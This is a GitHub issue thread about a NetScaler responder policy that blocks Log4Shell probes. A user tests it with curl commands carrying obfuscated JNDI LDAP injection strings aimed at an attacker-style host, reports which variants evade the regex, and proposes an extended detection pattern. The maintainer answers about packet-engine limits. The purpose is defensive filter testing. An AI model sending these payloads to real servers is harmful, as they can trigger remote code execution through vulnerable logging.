### ISSUE TITLE
Not sure if regex does match for the lower / upper 

### ISSUE THREAD

**Issue by progS1m** [mbp-netscaler/ADC#1]
I've tested your responder policy by using:
`curl https://www.mytestpage111.net  -H 'User-Agent: ${jndi:ldap://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${%7b    j    n   di:ldap://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`

Noticed that three request do not match the policy:
`curl https://www.mytestpage111.net  -H 'User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`
`curl https://www.mytestpage111.net  -H 'User-Agent: ${%7b    j    n   di:ldap://somesitehackerofhell.com/z}' -o /dev/null -w '%{http_code}\n' -s`

By slightly extending your regex:
(((\${)((\${)?((upper|lower|(env)?:.*:.*})?[jJlLnNdDiIaApPsSmMrRoOhH}:]*))+)\/\/)|(?:\{|\%7b|)[^\w]*?j[^\w]*?n[^\w]*?d[^\w]*?i[^\w]*?(?:\:|\%3a)

`add responder policy GLOVR_RSP_POL_Log4Shell_Headers "HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE.REGEX_MATCH(re#(((\\${)((\\${)\?((upper|lower|(env)\?:.*:.*})\?[jJlLnNdDiIaApPsSmMrRoOhH}:]*))+)//)|(\?:\{|\%7b)[^\w]*\?j[^\w]*\?n[^\w]*\?d[^\w]*\?i[^\w]*\?(\?:\:|\%3a)#)" RESET -logAction Log4Shell_Headers_log`
`add responder policy GLOVR_RSP_POL_Log4Shell_URL "HTTP.REQ.URL.PATH_AND_QUERY.DECODE_USING_TEXT_MODE.REGEX_MATCH(re#(((\\${)((\\${)\?((upper|lower|(env)\?:.*:.*})\?[jJlLnNdDiIaApPsSmMrRoOhH}:]*))+)//)|(\?:\{|\%7b)[^\w]*\?j[^\w]*\?n[^\w]*\?d[^\w]*\?i[^\w]*\?(\?:\:|\%3a)#)" RESET -logAction Log4Shell_URL_log`

does also match `${%7b    j    n   di:ldap://somesitehackerofhell.com/z}'`

But still the upper lower request not...

In comparison with https://regexer.com there everything does match. So is it a ADC Issue?
Any suggestions?

**Comment by mbp-netscaler** [comment]
Hi,
The regex and decode.using.text.mode should catch all, but after testing some more, there seems to be an issues after matching 3 times within the same, which turns into an undef hit. So the issue seems to be within the packet engine and we will have a chat with Citrix about it.
Thanks for the feedback

**Comment by mbp-netscaler** [comment]
Added a new regex and responder policy based on the feedback @progS1m, this one should work better with the packet engine.
We will still reach out to Citrix and try to figure out if there is an issue with the PE and regex
